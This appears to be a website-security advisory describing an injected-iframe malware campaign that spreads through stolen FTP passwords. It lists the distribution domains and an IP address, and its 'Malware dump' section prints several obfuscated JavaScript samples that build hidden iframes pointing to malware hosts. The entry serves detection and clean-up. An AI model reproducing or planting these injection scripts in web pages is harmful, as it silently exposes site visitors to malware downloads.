Description
Javascript encoded and hidden inside the HTML or PHP page. It is used to create an iframe to distribute malware hidden to the end user. In some cases it hides the content inside the <body onload>
or sometimes just as a plain javascript entry.
Domains Used
94.63.240.145
sausagesments.com
zirycatum.com
numudozaf.com
http://cubyfonizi.com/k985ytv.htm
Affecting
Any web site. It uses stolen FTP passwords to compromises the site (similar to Gumblar).
Clean up
Request support here (or sign up here).
Malware dump
<body onload = "status=’’;xj=’5.p’;w=’dz’;q=’.’;vz=’94.’;....;ch.setAttribute(hg,y);document.body.appendChild(ch);window.status=status;"/>
<body onload="j=’7’;yy=’le’;jp=’b’;p=’if’;l=’sa’;sb=’1c’;x=’tp’;ih=’a’;he=’7’;yq=’us’;y=’/i’;b=’ht’;u=’a’;v=’p=3’;ea=’://‘;xh=’0fc’;d=’7’;c=’s’;e=’p?t’;xn=’/ho’;n=’n’;k=’s.’;ds=’sr’;q=’c’;h=’t’;o=’9’;fc=’dex’;tn=’17’;bg=’.ph’;an=’com’;hj=’ra’;mp=’f’;cw=’a’;fw=’me’;z=’me’;zf=’n’;vn=’ge’;dd=p.concat(hj,fw);i=ds.concat(q);jn=b.concat(x,ea,l,yq,u,vn,c,z,n,h,k,an,xn,yy,y,zf,fc,bg,e,v,mp,jp,d,ih,xh,sb,tn,o,j,cw,he);var mu=document.createElement(dd);mu.setAttribute(‘width’,’5’);mu.setAttribute(‘height’,’5’);mu.setAttribute(‘style’,’display:none’);mu.setAttribute(i,jn);document.body.appendChild(mu);">
<script>ti=’.c";ai=’af’;qo=’p’;jn=’htm’;rf=’n’;tf=’doz’;yn=’ifr’;xm=’s’;cl=’o’;jd=’k9’;nn=’tv.’;rl=’85y’;r=’umu’;eh=’m/‘;ec=’htt’;sb=’rc’;f=’ame’;l=’://‘;b=yn.concat(f);gg=xm.concat(sb);qt=ec.concat(qo,l,rf,r,tf,ai,ti,cl,eh,jd,rl,nn,jn);var xp=document.createElement(b);xp.setAttribute(‘width’,’1’);xp.setAttribute(‘height’,’1’);xp.frameBorder=0;xp.setAttribute(gg,qt);document.body.appendChild(xp);</script><script>wa=’t’;p=’ht’;f=’k98’;tb=’ame’;bg=’.’;v=’sr’;g=’tp:’;vf=’/z’;bs=’t’;px=’v.h’;br=’yt’;k=’c’;yr=’m’;ds=’m’;ej=’/‘;au=’/‘;t=’com’;sp=’ifr’;r=’ca’;cp=’y’;wz=’ir’;wf=’u’;b=’5’;se=sp.concat(tb);oz=v.concat(k);db=p.concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);var ip=document.createElement(se);ip.setAttribute(‘width’,’1’);ip.setAttribute(‘height’,’1’);ip.frameBorder=0;ip.setAttribute(oz,db);document.body.appendChild(ip);</script>
<script>ez="://";la="k9";vp=’85y’;ma=’zi.’;s=’c’;f=’m’;kg=’cub’;i=’t’;zz=’/‘;l=’sr’;n=’c’;ng=’ame’;rv=’.ht’;gn=’om’;h=’ht’;tg=’v’;vl=’tp’;kf=’ni’;v=’ifr’;vq=’yfo’;bc=v.concat(ng);x=l.concat(n);p=h.concat(vl,ez,kg,vq,kf,ma,s,gn,zz,la,vp,i,tg,rv,f);var jc=document.createElement(bc);jc.setAttribute(‘width’,’1’);jc.setAttribute(‘height’,’1’);jc.frameBorder=0;jc.setAttribute(x,p);document.body.appendChild(jc);</script>